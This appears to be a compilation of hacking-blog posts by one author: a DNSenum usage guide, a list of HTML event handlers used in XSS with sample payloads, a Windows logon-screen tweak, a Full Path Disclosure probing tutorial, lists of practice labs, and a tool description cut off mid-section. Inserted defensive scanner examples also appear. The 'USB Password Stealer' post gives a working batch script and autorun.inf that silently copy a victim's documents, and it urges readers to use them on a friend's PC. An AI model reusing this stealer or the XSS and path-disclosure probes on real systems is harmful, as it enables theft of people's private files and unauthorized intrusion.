Dnsenum information gathering tutorial

Hello Guys 

Today I will show you the DNSENUM information gathering tool.

DNSenum is a pentesting tool created to enumerate DNS info about domains.

The purpose of Dnsenum is to gather as much information as possible about a domain.

DNSenum is a very useful tool for the quick enumeration step of a penetration test. It gathers:
    Host addresses
    Name servers
    MX records
    Subdomains
    Whois queries
    Reverse lookups for netblocks
    Google scraping to get the job done

Usage:
------------------------------------------------------------------
1) Simple scan
     dnsenum google.com

2) More thorough scan (--enum is a shortcut for --threads 5 -s 15 -w)
     dnsenum --enum google.com

3) Thorough scan with subdomain brute force (-f takes a wordlist file) and recursion (-r)
     dnsenum --enum -f <wordlist.txt> -r google.com

Note:

If you get an error like this:

Warning: can't load Net::Whois::IP module, whois queries disabled.

install the missing Perl module (the Debian package name is cpanminus):

--> apt-get install cpanminus
--> cpanm -n Net::Whois::IP




Thank you (zer0w0rm)


 

HTML event handlers

Hello, today I will share with you some HTML event handlers which are used in XSS and other web-based attacks.

1.    FSCommand() (attacker can use this when executed from within an embedded Flash object)
2.    onAbort() (when user aborts the loading of an image)
3.    onActivate() (when object is set as the active element)
4.    onAfterPrint() (activates after user prints or previews print job)
5.    onAfterUpdate() (activates on data object after updating data in the source object)
6.    onBeforeActivate() (fires before the object is set as the active element)
7.    onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
8.    onBeforeCut() (attacker executes the attack string right before a selection is cut)
9.    onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10.    onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11.    onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
12.    onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
13.    onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
14.    onBegin() (the onbegin event fires immediately when the element's timeline begins)
15.    onBlur() (in the case where another popup is loaded and the window loses focus)
16.    onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
17.    onCellChange() (fires when data changes in the data provider)
18.    onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
19.    onClick() (someone clicks on a form)
20.    onContextMenu() (user would need to right click on attack area)
21.    onControlSelect() (fires when the user is about to make a control selection of the object)
22.    onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
23.    onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.    onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.    onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.    onDataSetComplete() (fires to indicate that all data is available from the data source object)
27.    onDblClick() (user double-clicks a form element or a link)
28.    onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
29.    onDrag() (requires that the user drags an object)
30.    onDragEnd() (requires that the user drags an object)
31.    onDragLeave() (requires that the user drags an object off a valid location)
32.    onDragEnter() (requires that the user drags an object into a valid location)
33.    onDragOver() (requires that the user drags an object into a valid location)
34.    onDragDrop() (user drops an object (e.g. file) onto the browser window)
35.    onDrop() (user drops an object (e.g. file) onto the browser window)
36.    onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
37.    onError() (loading of a document or image causes an error)
38.    onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
39.    onFilterChange() (fires when a visual filter completes state change)
40.    onFinish() (attacker can create the exploit when marquee is finished looping)
41.    onFocus() (attacker executes the attack string when the window gets focus)
42.    onFocusIn() (attacker executes the attack string when window gets focus)
43.    onFocusOut() (attacker executes the attack string when window loses focus)
44.    onHelp() (attacker executes the attack string when the user hits F1 while the window is in focus)
45.    onKeyDown() (user depresses a key)
46.    onKeyPress() (user presses or holds down a key)
47.    onKeyUp() (user releases a key)
48.    onLayoutComplete() (user would have to print or print preview)
49.    onLoad() (attacker executes the attack string after the window loads)
50.    onLoseCapture() (can be exploited by the releaseCapture() method)
51.    onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
52.    onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
53.    onMouseDown() (the attacker would need to get the user to click on an image)
54.    onMouseEnter() (cursor moves over an object or area)
55.    onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
56.    onMouseMove() (the attacker would need to get the user to mouse over an image or table)
57.    onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
58.    onMouseOver() (cursor moves over an object or area)
59.    onMouseUp() (the attacker would need to get the user to click on an image)
60.    onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
61.    onMove() (user or attacker would move the page)
62.    onMoveEnd() (user or attacker would move the page)
63.    onMoveStart() (user or attacker would move the page)
64.    onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
65.    onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
66.    onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
67.    onProgress() (attacker would use this as a flash movie was loading)
68.    onPropertyChange() (user or attacker would need to change an element property)
69.    onReadyStateChange() (user or attacker would need to change an element property)
70.    onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
71.    onReset() (user or attacker resets a form)
72.    onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
73.    onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
74.    onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
75.    onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
76.    onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
77.    onRowsEnter() (user or attacker would need to change a row in a data source)
78.    onRowExit() (user or attacker would need to change a row in a data source)
79.    onRowDelete() (user or attacker would need to delete a row in a data source)
80.    onRowInserted() (user or attacker would need to insert a row in a data source)
81.    onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
82.    onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
83.    onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
84.    onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
85.    onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
86.    onStart() (fires at the beginning of each marquee loop)
87.    onStop() (user would need to press the stop button or leave the webpage)
88.    onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
89.    onSubmit() (requires attacker or user submits a form)
90.    onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
91.    onTrackChange() (user or attacker changes track in a playList)
92.    onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
93.    onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
94.    seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)



Thank you (zer0w0rm)
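As an added example (not from the original post), here is the defender's counterpart to the list above: a small Python scanner that finds and strips inline on* event handler attributes in an untrusted HTML fragment. It uses the standard-library HTML parser, and the sample fragments are constructed; for production input use a maintained sanitizer library.

```python
"""Added example (not from the original post): find and strip inline event
handler attributes (onload, onerror, onend, ...) in an untrusted HTML fragment.
The standard-library parser handles the case and quoting tricks a regex would
miss; the sample fragments below are constructed."""
import html
from html.parser import HTMLParser


class EventHandlerScanner(HTMLParser):
    """Records every attribute whose name starts with 'on' and rebuilds the
    fragment without those attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (tag, attribute, value) triples
        self.out = []       # pieces of the sanitized output

    def _render(self, tag, attrs, self_closing):
        kept = []
        for name, value in attrs:
            # HTMLParser lowercases names, so ONLOAD and oNcLiCk both land here.
            if name.startswith("on"):
                self.findings.append((tag, name, value or ""))
                continue
            if value is None:
                kept.append(name)  # boolean attribute such as "disabled"
            else:
                kept.append(f'{name}="{html.escape(value, quote=True)}"')
        inner = " ".join([tag] + kept)
        self.out.append(f"<{inner}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        self._render(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._render(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is re-escaped on output (this also alters script/style bodies).
        self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments are dropped; they carry nothing the page needs


def scan_fragment(fragment):
    """Return (findings, sanitized_html) for an HTML fragment."""
    parser = EventHandlerScanner()
    parser.feed(fragment)
    parser.close()
    return parser.findings, "".join(parser.out)


# Constructed samples, including the HTML+TIME vector quoted in the list above.
SAMPLES = [
    '<img src=x onerror=alert(1)>',
    '<P STYLE="behavior:url(\'#default#time2\')" onEnd="alert(\'XSS\')">',
    '<a href="#" oNcLiCk=\'go()\'>Click</a>',
    '<p class="note">Hello &amp; welcome</p>',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        findings, clean = scan_fragment(sample)
        print(findings, "->", clean)
```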
 

How to Change the Windows 7 Logon Screen?

How would you like to change the logon screen background in Windows 7 to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing the logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Here are step-by-step instructions to customize the logon screen background.


1. The image you need to set as the background should be a .jpg file and its size should not exceed 245KB.
 
2. The image resolution can be anything of your choice. However, I prefer 1440 x 900 or 1024 x 768. You can use any photo editing software such as Photoshop to compress and set the resolution of your image. Once you're done, save this image as background.jpg.
 
3. You will need to copy this image to
C:\Windows\System32\oobe\backgrounds
You will need to create that path if it does not already exist on your computer.
 
4. Now open the Registry Editor (Start -> Run -> type regedit) and navigate to the following key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background
If Background does not exist, right-click LogonUI, select New and then Key, and name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background, select New and then DWORD, and name it OEMBackground.
 
5. Double-click on OEMBackground and set the Value Data to 1.
 
6. Now log off to see the new logon screen background.

Thank you (zer0w0rm)
 

USB Password Stealer

In today's article I am going to teach you something illegal, but only for educational purposes. This only demonstrates how you can copy files from your friend's PC as soon as you plug in your flash drive or any removable storage media.

I am going to teach you how you can do this from a batch file with the help of an autorun.inf file.
Let me tell you the basics of what will happen.

When you plug in your pen drive, the system will look for autorun.inf (in case autorun is not disabled for your drive on the system).

Then we'll put some commands in autorun.inf so that it loads the batch file that does the magic of copying all the files from the PC. In this demonstration I am copying only the files and folders in My Documents.

Here goes the batch code:

@echo off
:CHECK
if not exist "%homedrive%\Copied_files" md "%homedrive%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR

:COPIER
if not exist "%homedrive%\Copied_files\%computername%" md "%homedrive%\Copied_files\%computername%"
if not exist "%homedrive%\Copied_files\%computername%\VIDEOS" md "%homedrive%\Copied_files\%computername%\VIDEOS"
if not exist "%homedrive%\Copied_files\%computername%\PICTURES" md "%homedrive%\Copied_files\%computername%\PICTURES"
if not exist "%homedrive%\Copied_files\%computername%\MUSIC" md "%homedrive%\Copied_files\%computername%\MUSIC"
if not exist "%homedrive%\Copied_files\%computername%\DOWNLOADS" md "%homedrive%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%homedrive%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%homedrive%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%homedrive%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%homedrive%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%homedrive%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit


:ERROR
exit


What it actually does: in the first case, CHECK, it checks whether your removable storage has a Copied_files folder or not. If it doesn't, it creates one using the MD (Make Directory) command.

Again it checks if you have a Documents and Settings folder; if so, it assumes that you are using Windows XP. Otherwise it returns an error and exits.

This happens because in Windows XP the user's documents are usually stored in the %systemroot%\Documents and Settings folder.

Now I've defined another two cases after the first case CHECK, that is, the COPIER case and the ERROR case.

Case COPIER executes when the program recognizes it is Windows XP; that is where the real copying work is done.

Case ERROR executes when Documents and Settings doesn't exist in your system root.

This is just a simple use of batch programming. Copy the above code, paste it in Notepad and save it as Filename.bat.

Now let's create a file that will load it automatically.

[autorun]
Open=Filename.bat
Action=File Copier


The above code goes in the autorun.inf file. Open Notepad, paste it in and save it as autorun.inf.



Copy the two files, autorun.inf and Filename.bat, to your flash drive.

Then plug your device into your friend's PC and do the evil things.

Where is the flaw?

It shows a command prompt window and the copying process (thank god your noob friend will never think that it is actually copying).



Another thing is that it determines the Windows version by looking for the Users and Documents and Settings folders, which is not the right way to determine the operating system.

However, this is just an educational tutorial.

Hope this tutorial was helpful.


Thank you(zer0w0rm)
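As an added example (not from the original post), here is what a removable-media check on the defending side looks like: a Python parser for autorun.inf that flags entries which would launch a program or script on insertion, using the [autorun] layout shown in the post. The sample files are constructed; the only assumption is that the file uses that INI-style layout.

```python
"""Added example (not from the original post): parse autorun.inf the way a
removable-media scanner would and flag entries that launch a program or script.
SAMPLE_* strings are constructed; the [autorun] layout matches the post."""
import configparser
import ntpath

# Extensions Windows runs directly (or hands to a script interpreter).
EXECUTABLE_EXTS = {".bat", ".cmd", ".exe", ".com", ".vbs", ".js", ".scr", ".pif", ".ps1"}


def parse_autorun(text):
    """Return the [autorun] section as {lowercase key: value}; {} if absent.
    The section name and keys are case-insensitive in Windows, so both are
    normalised here. Only '=' is a delimiter (values often contain ':')."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True, delimiters=("=",))
    cp.optionxform = str.lower
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "autorun":
            return {k: (v or "") for k, v in cp.items(section)}
    return {}


def _first_token(command):
    """Program path from a command line: a quoted path, else the first word."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def is_launch_key(key):
    """Keys whose value Windows executes for AutoRun/AutoPlay."""
    return key in ("open", "shellexecute") or (
        key.startswith("shell\\") and key.endswith("\\command"))


def assess_autorun(text):
    """Return (key, program, reason) findings for a risky autorun.inf."""
    entries = parse_autorun(text)
    findings = []
    for key, value in entries.items():
        if not is_launch_key(key):
            continue
        target = _first_token(value)
        ext = ntpath.splitext(target)[1].lower()
        if ext in EXECUTABLE_EXTS:
            findings.append((key, target, f"runs a {ext} program on insertion"))
    # A custom Action= label only matters when something is launched: it is the
    # text the AutoPlay dialog shows in place of the real program name.
    if findings and "action" in entries:
        findings.append(("action", entries["action"],
                         "custom AutoPlay label disguises the launcher"))
    return findings


# Constructed samples: the post's file, a benign label-only file, and a
# shell\open\command variant with a quoted path.
SAMPLE_POST = "[autorun]\nOpen=Filename.bat\nAction=File Copier\n"
SAMPLE_BENIGN = "[AutoRun]\nicon=setup.exe,0\nlabel=Backup Drive\n"
SAMPLE_SHELL = '[autorun]\nshell\\open\\command="My Setup.exe" /s\nshell=open\n'

if __name__ == "__main__":
    for name, sample in (("post", SAMPLE_POST), ("benign", SAMPLE_BENIGN),
                         ("shell", SAMPLE_SHELL)):
        print(name, assess_autorun(sample))
```

Disabling AutoRun for every drive type (NoDriveTypeAutoRun = 0xFF under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer) removes the trigger this post relies on altogether.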
 

Full Path Disclosure Attack

Hello, today I will discuss the FPD web application attack.

------------------------------------------------------------------------------
What is Full Path Disclosure?
------------------------------------------------------------------------------

To put it simply, Full Path Disclosure (FPD) is the revelation of the full path of a given file. FPD is performed by causing an error within a targeted website, which in turn spits out an error message for an attacker to see. FPD vulnerabilities are generally looked upon as low risk and are too often overlooked by webmasters as nothing to worry about ("I will take care of it later"). This can sometimes be a fatal mistake.

------------------------------------------------------------------------------
When and why are path disclosure vulnerabilities useful?
------------------------------------------------------------------------------

While FPD vulnerabilities are low risk, they can be used in conjunction with other exploitation techniques and can often be the key to a successful hack.

One example of such a relationship would be the use of an LFI (Local File Include) vulnerability partnered with FPD. With LFI, the attacker may not be able to find the containing folder for a certain file they wish to view (for example: config.php), or maybe the standard includes folder has been renamed. If an attacker can cause an error that will spit out the location of the folder, it would make the hack much faster, smoother and easier than trying to guess the path. The attacker might even get lucky and find that the webmaster uses txt files to store database information rather than SQL (do not laugh, it happens).

------------------------------------------------------------------------------
How do I find a path disclosure vulnerability?
------------------------------------------------------------------------------

There are a number of ways to test for FPD vulnerabilities, and each takes little time.

The first method is to find a page that calls from an array, for example: index.php?page=home. To check this for a vulnerability, one would add an inoperable value to the URL. There are a number of ways to do this. The most effective would be to add open and closed square brackets [] to the end of the page parameter name, which makes the call for the page defunct. The URL for this example would be index.php?page[]=home. This method would cause errors such as:


Warning: opendir(Array): failed to open dir: No such file or directory in /home/www/example/kei/photo/index.php on line 297


Warning: pg_num_rows(): supplied argument is not a valid PostgreSQL result resource in /usr/home/example/html/pie/index.php on line 131

Another method that can cause an FPD is to add an inoperable value to a cookie. The easiest and most common is to null the session cookie. In order to do this, one must use Javascript injection to inject the invalid value. To do this, add the following line into the URL bar in a web browser: javascript:void(document.cookie='PHPSESSID='); (if you do not know how or why this works, refer to the Javascript injection article). This can cause the following error:


Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2
 

Array[] Parameter Injection is made possible when a script builds a call from a $_GET parameter. If the $_GET parameter is passed to a function that expects a string, for instance htmlentities() or opendir(), but receives an array, it will result in an error message. The output of the error message will look similar to the following:

Warning: htmlentities() expects parameter 1 to be string, array given in /var/www/foobar.php on line 16

As the function expects that parameter to be a string, passing an array renders the call defunct, outputting only the error from the function.



------------------------------------------------------------------------------
How do I prevent such vulnerabilities?
------------------------------------------------------------------------------

The simplest way to prevent these vulnerabilities is to turn off error reporting on your server. This will immediately suppress any errors that may be caused. The problem with this method, however, is that if you do have a problem with one of your scripts, it can be hard to determine where and what the problem is without the aid of the error message.


Regular expressions are also useful in suppressing the errors, especially in the case of the cookie injection. For the array vulnerabilities, the is_array() function can be used to patch the vulnerability. The good thing about these last two methods is that you can also use them to echo fake errors to confuse your attacker.

------------------------------------------------------------------------------
Conclusion
------------------------------------------------------------------------------

In conclusion, I would like to once again stress that these vulnerabilities are useful only in certain circumstances and won't allow you to penetrate a server/site with this technique alone. You will have to rely on other techniques in conjunction with this vulnerability or other insecure practices (bad file extensions etc.).

I hope you enjoyed the article and learned something from it. 


Thank you (zer0w0rm)
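As an added example (not from the original post), here is a detection routine a defender can run against their own application's responses and request logs: it scans HTTP response bodies for the PHP error format quoted above (the "in <path> on line <n>" pattern that leaks the path) and flags query strings carrying the array-parameter probe from the first method. The sample responses and URLs are constructed.

```python
"""Added example (not from the original post): detect Full Path Disclosure in
HTTP response bodies and array-parameter probes in query strings, using the PHP
error formats quoted in the post. The sample body and URLs are constructed."""
import html
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# PHP's default display_errors line: "<level>: <message> in <file> on line <n>"
PHP_ERROR_RE = re.compile(
    r"(?P<level>Warning|Notice|Deprecated|Fatal error|Parse error)\s*:\s*"
    r"(?P<message>.*?)\s+in\s+(?P<path>(?:/|[A-Za-z]:\\)\S+)\s+on\s+line\s+(?P<line>\d+)"
)
FUNC_RE = re.compile(r"([A-Za-z_][\w:]*)\(")   # leading "opendir(" etc.
TAG_RE = re.compile(r"<[^>]+>")


def find_path_disclosures(body):
    """Return one dict per PHP error line in *body* that reveals a file path.
    Markup is stripped first because display_errors wraps parts in <b> tags."""
    text = html.unescape(TAG_RE.sub("", body))
    hits = []
    for m in PHP_ERROR_RE.finditer(text):
        func = FUNC_RE.match(m["message"])
        hits.append({
            "level": m["level"],
            "function": func.group(1) if func else None,
            "path": m["path"],
            # The directory is what an LFI attacker actually wants from an FPD.
            "directory": posixpath.dirname(m["path"]),
            "line": int(m["line"]),
        })
    return hits


def array_probe_params(url):
    """Names of query parameters sent as PHP arrays (page[]=x or page[k]=x),
    the probe used against string-expecting functions such as opendir()."""
    query = urlsplit(url).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True) if "[" in k]


# Constructed response body: one HTML-formatted warning (as display_errors
# emits it) and one plain-text warning, both taken from the formats above.
SAMPLE_BODY = """<html><body>
<br />
<b>Warning</b>:  opendir(Array): failed to open dir: No such file or directory in <b>/home/www/example/kei/photo/index.php</b> on line <b>297</b><br />
<p>Gallery</p>
Warning: htmlentities() expects parameter 1 to be string, array given in /var/www/foobar.php on line 16
</body></html>"""

if __name__ == "__main__":
    for hit in find_path_disclosures(SAMPLE_BODY):
        print(hit)
    print(array_probe_params("http://example.test/index.php?page[]=home&id=3"))
```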
 

Pen-testing List of Labs

Vulnerable Web Applications
OWASP BWA http://code.google.com/p/owaspbwa/
OWASP Hackademic http://hackademic1.teilar.gr/
OWASP SiteGenerator https://www.owasp.org/index.php/Owasp_SiteGenerator
OWASP Bricks http://sourceforge.net/projects/owaspbricks/
OWASP Security Shepherd https://www.owasp.org/index.php/OWASP_Security_Shepherd
Damn Vulnerable Web App (DVWA) http://www.dvwa.co.uk/
Damn Vulnerable Web Services (DVWS) http://dvws.professionallyevil.com/
WebGoat.NET https://github.com/jerryhoff/WebGoat.NET/
PentesterLab https://pentesterlab.com/
Butterfly Security Project http://thebutterflytmp.sourceforge.net/
Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Foundstone Hackme Books http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Foundstone Hackme Casino http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Foundstone Hackme Shipping http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Foundstone Hackme Travel http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
LAMPSecurity http://sourceforge.net/projects/lampsecurity/
Moth http://www.bonsai-sec.com/en/research/moth.php
WackoPicko https://github.com/adamdoupe/WackoPicko
BadStore http://www.badstore.net/
WebSecurity Dojo http://www.mavensecurity.com/web_security_dojo/
BodgeIt Store http://code.google.com/p/bodgeit/
hackxor http://hackxor.sourceforge.net/cgi-bin/index.pl
SecuriBench http://suif.stanford.edu/~livshits/securibench/
SQLol https://github.com/SpiderLabs/SQLol
CryptOMG https://github.com/SpiderLabs/CryptOMG
XMLmao  https://github.com/SpiderLabs/XMLmao
Exploit KB Vulnerable Web App http://exploit.co.il/projects/vuln-web-app/
PHDays iBank CTF http://blog.phdays.com/2012/05/once-again-about-remote-banking.html
GameOver http://sourceforge.net/projects/null-gameover/
Zap WAVE http://code.google.com/p/zaproxy/downloads/detail?name=zap-wave-0.1.zip
PuzzleMall http://code.google.com/p/puzzlemall/
VulnApp http://www.nth-dimension.org.uk/blog.php?id=88
sqli-labs https://github.com/Audi-1/sqli-labs
Drunk Admin Web Hacking Challenge https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/
bWAPP http://www.mmeit.be/bwapp/ (bee-box VM: http://sourceforge.net/projects/bwapp/files/bee-box/)
NOWASP / Mutillidae 2  http://sourceforge.net/projects/mutillidae/
SocketToMe http://digi.ninja/projects/sockettome.php
Vulnerable Operating System Installations
Damn Vulnerable Linux http://sourceforge.net/projects/virtualhacking/files/os/dvl/
Metasploitable http://sourceforge.net/projects/virtualhacking/files/os/metasploitable/
LAMPSecurity http://sourceforge.net/projects/lampsecurity/
UltimateLAMP http://www.amanhardikar.com/mindmaps/practice-links.html
heorot: DE-ICE, hackerdemia http://hackingdojo.com/downloads/iso/De-ICE_S1.100.iso
http://hackingdojo.com/downloads/iso/De-ICE_S1.110.iso
http://hackingdojo.com/downloads/iso/De-ICE_S1.120.iso
http://hackingdojo.com/downloads/iso/De-ICE_S2.100.iso
hackerdemia – http://hackingdojo.com/downloads/iso/De-ICE_S1.123.iso
pWnOS http://www.pwnos.com/
Holynix http://sourceforge.net/projects/holynix/files/
Kioptrix http://www.kioptrix.com/blog/
exploit-exercises – nebula, protostar, fusion http://exploit-exercises.com/download
PenTest Laboratory  http://pentestlab.org/lab-in-a-box/
RebootUser Vulnix http://www.rebootuser.com/?page_id=1041
neutronstar http://neutronstar.org/goatselinux.html
scriptjunkie.us  http://www.scriptjunkie.us/2012/04/the-hacker-games/
21LTR http://21ltr.com/scenes/
SecGame # 1: Sauron http://sg6-labs.blogspot.co.uk/2007/12/secgame-1-sauron.html
Pentester Lab https://www.pentesterlab.com/exercises
Vulnserver http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
TurnKey Linux http://www.turnkeylinux.org/
Bitnami https://bitnami.com/stacks
Elastic Server http://elasticserver.com
CentOS http://www.centos.org/
Sites for Downloading Older Versions of Various Software
Exploit-DB http://www.exploit-db.com/
Old Version http://www.oldversion.com/
Old Apps  http://www.oldapps.com/
VirtualHacking Repo sourceforge.net/projects/virtualhacking/files/apps%40realworld/
Sites by Vendors of Security Testing Software
Acunetix acuforum http://testasp.vulnweb.com/
Acunetix acublog http://testaspnet.vulnweb.com/
Acunetix acuart http://testphp.vulnweb.com/
Cenzic crackmebank http://crackme.cenzic.com
HP freebank http://zero.webappsecurity.com
IBM altoromutual http://demo.testfire.net/
Mavituna testsparker http://aspnet.testsparker.com
Mavituna testsparker http://php.testsparker.com
NTOSpider Test Site http://www.webscantest.com/
Sites for Improving Your Hacking Skills
EnigmaGroup http://www.enigmagroup.org/
Exploit Exercises http://exploit-exercises.com/
Google Gruyere http://google-gruyere.appspot.com/
Gh0st Lab http://www.gh0st.net/
Hack A Server  https://hackaserver.com/
Hack This Site  http://www.hackthissite.org/
HackThis  http://www.hackthis.co.uk/
HackQuest http://www.hackquest.com/
Hack.me https://hack.me
Hacking-Lab https://www.hacking-lab.com
Hacker Challenge http://www.dareyourmind.net/
Hacker Test http://www.hackertest.net/
hACME Game http://www.hacmegame.org/
Hax.Tor http://hax.tor.hu/
OverTheWire http://www.overthewire.org/wargames/
PentestIT  http://www.pentestit.ru/en/
p0wnlabs  http://p0wnlabs.com/
pwn0 https://pwn0.com/home.php
RootContest http://rootcontest.com/
Root Me http://www.root-me.org/?lang=en
Security Treasure Hunt http://www.securitytreasurehunt.com/
Smash The Stack http://www.smashthestack.org/
TheBlackSheep and Erik  http://www.bright-shadows.net/
ThisIsLegal http://thisislegal.com/
Try2Hack http://www.try2hack.nl/
WabLab http://www.wablab.com/hackme
XSS: Can You XSS This? http://canyouxssthis.com/HTMLSanitizer/
XSS: ProgPHP http://xss.progphp.com/
CTF Sites / Archives
CTFtime (Details of CTF Challenges) http://ctftime.org/ctfs/
shell-storm Repo http://shell-storm.org/repo/CTF/
CAPTF Repo http://captf.com/
VulnHub https://www.vulnhub.com
CTF365 http://ctf365.com/
Hacker Cons http://hackercons.org/
Hat Force https://www.hatforce.com/
Intense School http://www.intenseschool.com/resources/
SECore https://secore.info/
Mobile Apps
ExploitMe Mobile Android Labs http://securitycompass.github.io/AndroidLabs/
ExploitMe Mobile iPhone Labs http://securitycompass.github.io/iPhoneLabs/
OWASP iGoat  http://code.google.com/p/owasp-igoat/
OWASP Goatdroid https://github.com/jackMannino/OWASP-GoatDroid-Project
Damn Vulnerable iOS App (DVIA) http://damnvulnerableiosapp.com/
Damn Vulnerable Android App (DVAA) https://code.google.com/p/dvaa/
Damn Vulnerable FirefoxOS Application (DVFA) https://github.com/pwnetrationguru/dvfa/
NcN Wargame http://noconname.org/evento/wargame/
Hacme Bank Android http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx
InsecureBank http://www.paladion.net/downloadapp.html
Miscellaneous
VulnVPN http://www.rebootuser.com/?page_id=1041
VulnVoIP http://www.rebootuser.com/?page_id=1041
NETinVM http://informatica.uv.es/~carlos/docencia/netinvm/
GNS3 http://sourceforge.net/projects/gns-3/
XAMPP https://www.apachefriends.org/index.html

Thank you (zer0w0rm)
 

Search Engine Assessment Tool

Introduction

SEAT (Search Engine Assessment Tool) is the next generation information digging application geared toward the needs of security professionals. SEAT uses information stored in search engine databases, cache repositories, and other public resources to scan web sites for potential vulnerabilities. Its multi-threaded, multi-database, and multi-search-engine capabilities permit easy navigation through vast amounts of information with the goal of system security assessment. Furthermore, SEAT's ability to easily process additional search engine signatures as well as custom made vulnerability databases allows security professionals to adapt SEAT to their specific needs.



Features

The most important strength of SEAT is its ability to simulate what attackers or malware would do when they anonymously collect potentially harmful public information available on your site. Using SEAT you can perform similar assessments faster, with the ability to dig through large sets of information to pinpoint potential vulnerabilities.

Search Engine Abstraction

SEAT utilizes search engine abstraction to automatically adapt queries to multiple search engines. This means that a single signature that could normally be applied to only one search engine will be abstracted and adapted to all search engines supported by SEAT. This increases your chances of finding a vulnerability that would otherwise be missed by a single search engine approach.

Performance

From the high performance database, which allows you to quickly store and retrieve thousands of mined results and domains, to the flexible multi-threaded query engine, all parts of SEAT are optimized for quick and reliable performance.

Note: SEAT does not use APIs provided by some search engines, thus avoiding unnecessary limitations in the number of requests made in a given period of time.

Usability

A great deal of time went into the design of a user-friendly and efficient GUI to allow you to get the most from the time spent working with the tool. Almost every part of SEAT can be adjusted to fit your individual needs, while default settings are provided for beginning users.

Anonymity

